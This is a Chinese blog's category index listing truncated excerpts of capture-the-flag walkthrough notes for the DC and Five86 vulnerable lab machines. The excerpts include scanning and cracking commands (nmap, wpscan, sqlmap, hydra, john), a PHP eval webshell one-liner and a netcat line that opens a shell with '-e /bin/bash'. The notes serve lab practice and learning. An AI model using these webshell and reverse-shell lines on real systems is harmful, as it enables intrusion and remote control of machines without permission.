随笔分类 - 网络安全技术 / DC靶机系列通关笔记
摘要:fping -aqg 192.168.1.1/24 nmap -sS -sV -sC -p- -n -Pn -T4 -vvv -oN five86-2 192.168.1.149 wpscan --url http://five86-2 -e -u wpscan --url http://five8
阅读全文
摘要:sudo arp-scan -l nmap -sS -sV -sC -p- -n -Pn -T4 -vvv -oN Five86-1 192.168.1.147 crunch 10 10 aefhrt > passsudo john --wordlist=pass 1.txt 最后总结: 1.Ope
阅读全文
摘要:sudo arp-scan -l sudo nmap -sS -A -p- -n -Pn -T4 -oN DC9 192.168.1.144 sqlmap -r target.txt -random-agent --dbs hydra -L username.txt -P password.txt
阅读全文
摘要:靶机ip 192.168.1.143 nmap -sV -sC -p- -vvv -n -Pn -T4 -oN DC-8 192.168.1.143 droopescan scan drupal -u http://192.168.1.143 searchexploit drupal 7 sqlma
阅读全文
摘要:fping -aqg 192.168.1.1/24 nmap -A -p- -sC -T3 -n -Pn -oN DC7 192.168.1.142 droopescan scan drupal http://192.168.1.142 在drupal官网找到了方法 https://www.drup
阅读全文
摘要:fping -aqg 192.168.1.1/24 nmap -sC -A -n -p- -Pn -T5 -oN DC-6 192.168.1.141 wpscan --url http://wordy/ -e -u nc 192.168.1.131 1337 -e /bin/bash https:
阅读全文
摘要:寻找靶机ip fping -aqg 192.168.1.0/24 sudo nmap -sC -A -p- -n -Pn -T4 -oN DC-5 192.168.1.137 <?php eval($_REQUEST[xxx])?> find / -user root -perm -4000 -pr
阅读全文
摘要:首先寻找靶机ip netdiscover -r 192.168.1.0/24 nmap -sS -p- -n -Pn 192.168.1.136 nmap -A -p22,80 -T3 -n -Pn 192.168.1.136 sqlmap -r xxx.txt random-agent --dbs
阅读全文
摘要:首先找到靶机ipnetdiscover -r 192.168.1.0/24 nmap -sS -T3 -p- 192.168.1.135 nmap -A -n -Pn -T3 -p80 192.168.1.135 找了一个牛逼的字典https://github.com/TheKingOfDuck/f
阅读全文
摘要:最后总结: 1.WPScan是一个扫描 WordPress 漏洞的黑盒子扫描器,它可以为所有 Web 开发人员扫描 WordPress 漏洞并在他们开发前找到并解决问题。 https://xz.aliyun.com/t/2794 2.突破受限shell的方法,可以用vi等等 https://www.
阅读全文
摘要:nmap -A -sC -sS -n -Pn -vvv -oN DC-1 192.168.1.156 droopescan scan drupal -u 192.168.1.156 python -c 'import pty;pty.spawn("/bin/bash")' #优化终端 https:/
阅读全文

浙公网安备 33010602011771号